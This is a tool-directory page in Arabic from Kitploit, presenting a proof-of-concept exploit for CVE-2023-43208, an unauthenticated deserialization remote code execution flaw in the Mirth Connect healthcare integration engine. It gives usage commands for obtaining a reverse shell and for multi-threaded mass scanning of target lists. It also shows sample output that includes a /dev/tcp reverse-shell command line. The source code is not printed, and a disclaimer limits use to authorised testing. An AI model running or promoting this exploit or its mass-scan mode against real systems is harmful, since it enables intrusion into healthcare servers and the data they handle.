Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-43208 — استغلال PoC لثغرة CVE-2023-43208 - تنفيذ التعليمات البرمجية عن بُعد (RCE) في Mirth Connect | Kitploit
أدوات/GitHubGitHub/4nuxd/cve-2023-43208
ماسحات الثغرات الأمنيةتوليد الحمولةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHub4nuxd/cve-2023-43208

CVE-2023-43208

استغلال PoC لثغرة CVE-2023-43208 - تنفيذ التعليمات البرمجية عن بُعد (RCE) في Mirth Connect

عرض المستودع
1منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-43208 — ثغرة تنفيذ أوامر عن بعد في Mirth Connect

Python CVE Platform

أداة إثبات المفهوم لثغرة CVE-2023-43208، وهي ثغرة تنفيذ أوامر عن بعد غير مصادق عليها في Mirth Connect الإصدارات التي تسبق 4.4.1.


الوصف

Mirth Connect هو محرك تكامل رعاية صحية مفتوح المصدر واسع الانتشار. تستغل هذه الثغرة خلل إلغاء التسلسل في Java عبر نقطة النهاية /api/users باستخدام حمولة XML مصممة لتسلسل أدوات Apache Commons Collections لتحقيق تنفيذ أوامر عن بعد غير مصادق عليه.

الإصدار المحسن يستبدل المستمع pwncat الأصلي بقشرة PTY تفاعلية خالية تمامًا من التبعيات باستخدام مكتبات بايثون المضمنة فقط (socket, select, tty, termios). يتم ترقية القشرة تلقائيًا إلى PTY كاملة عند الاتصال.


الإصدارات المتأثرة

البرنامجالإصدارات المعرضةالإصدار المُصحح
Mirth Connect< 4.4.14.4.1+

المميزات

  • الكشف التلقائي عن مثيل Mirth Connect
  • بصمة الإصدار والتحقق من الثغرة
  • تنفيذ أوامر عن بعد غير مصادق عليه عبر حمولة إلغاء التسلسل XML
  • ترقية القشرة إلى PTY تلقائيًا (الرجوع إلى python3/python/script)
  • نقل حجم الطرفية بشكل صحيح (stty rows/cols)
  • ماسح ضخم بدعم تعدد الخيوط
  • إخراج الأهداف المعرضة إلى ملف
  • لا تبعية لـ pwncat — فقط مكتبات بايثون القياسية للمستمع

التثبيت

root@kitploit:~
git clone https://github.com/yourrepo/CVE-2023-43208
cd CVE-2023-43208
pip install -r requirements.txt

المتطلبات

root@kitploit:~
requests
packaging
rich
alive-progress

الاستخدام

هدف واحد — الحصول على قشرة

root@kitploit:~
python3 CVE-2023-43208.py -u https://<TARGET> -lh <YOUR_IP> -lp <PORT>

هدف واحد — مع ngrok / منفذ ربط

root@kitploit:~
python3 CVE-2023-43208.py -u https://<TARGET> -lh <YOUR_IP> -lp <NGROK_PORT> -bp <LOCAL_PORT>

مسح جماعي من ملف

root@kitploit:~
python3 CVE-2023-43208.py -f targets.txt -t 50 -o vulnerable.txt

الوسائط


مثال على الإخراج

root@kitploit:~
[*] Setting up listener on 10.10.15.202:4444 and launching exploit...
[*] Waiting for incoming connection on port 4444...
[*] Looking for Mirth Connect instance...
[+] Found Mirth Connect instance
[+] Vulnerable Mirth Connect version 4.4.0 instance found at https://10.129.5.3
[!] sh -c $@|sh . echo bash -c '0<&53-;exec 53<>/dev/tcp/...'
[*] Launching exploit against https://10.129.5.3...
[+] Received connection from 10.129.5.3:59640
[+] Shell opened! Upgrading to PTY...

root@mirth:/# 

إخلاء المسؤولية

هذه الأداة مخصصة لاختبار الاختراق المصرح به والأغراض التعليمية فقط.
الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها غير قانوني.
المؤلفون غير مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.


الإسناد

  • كود بواسطة: K3ysTr0K3R و Chocapikk
  • محسّن بواسطة: 4nuxd
تنزيل الأداة
العلمالوصف
-u, --urlعنوان الهدف
-lh, --lhostعنوان IP المستمع لديك
-lp, --lportمنفذ الاستماع لديك
-bp, --bindportتجاوز منفذ الربط (مفيد مع ngrok)
-f, --fileملف يحتوي على قائمة عناوين الهدف
-o, --outputحفظ الأهداف المعرضة إلى ملف
-t, --threadsعدد الخيوط للمسح (الافتراضي: 50)